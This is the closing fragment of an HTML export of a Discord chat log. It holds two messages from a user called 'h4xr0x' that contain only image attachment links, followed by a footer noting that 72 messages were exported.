        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">23-Feb-21 08:55 PM</span>

            <div class="chatlog__message " data-message-id="813967303196278794" id="message-813967303196278794">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/813967302994165760/unknown-2.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/813967302994165760/unknown-2.png" alt="Image attachment" title="Image: unknown-2.png (105.08 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">24-Feb-21 06:49 AM</span>

            <div class="chatlog__message " data-message-id="814116795471757322" id="message-814116795471757322">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/814116795233468446/unknown.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/814116795233468446/unknown.png" alt="Image attachment" title="Image: unknown.png (351.31 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
    </div>
</div>

</div>

<div class="postamble">
    <div class="postamble__entry">Exported 72 message(s)</div>
</div>

</body>

</html>
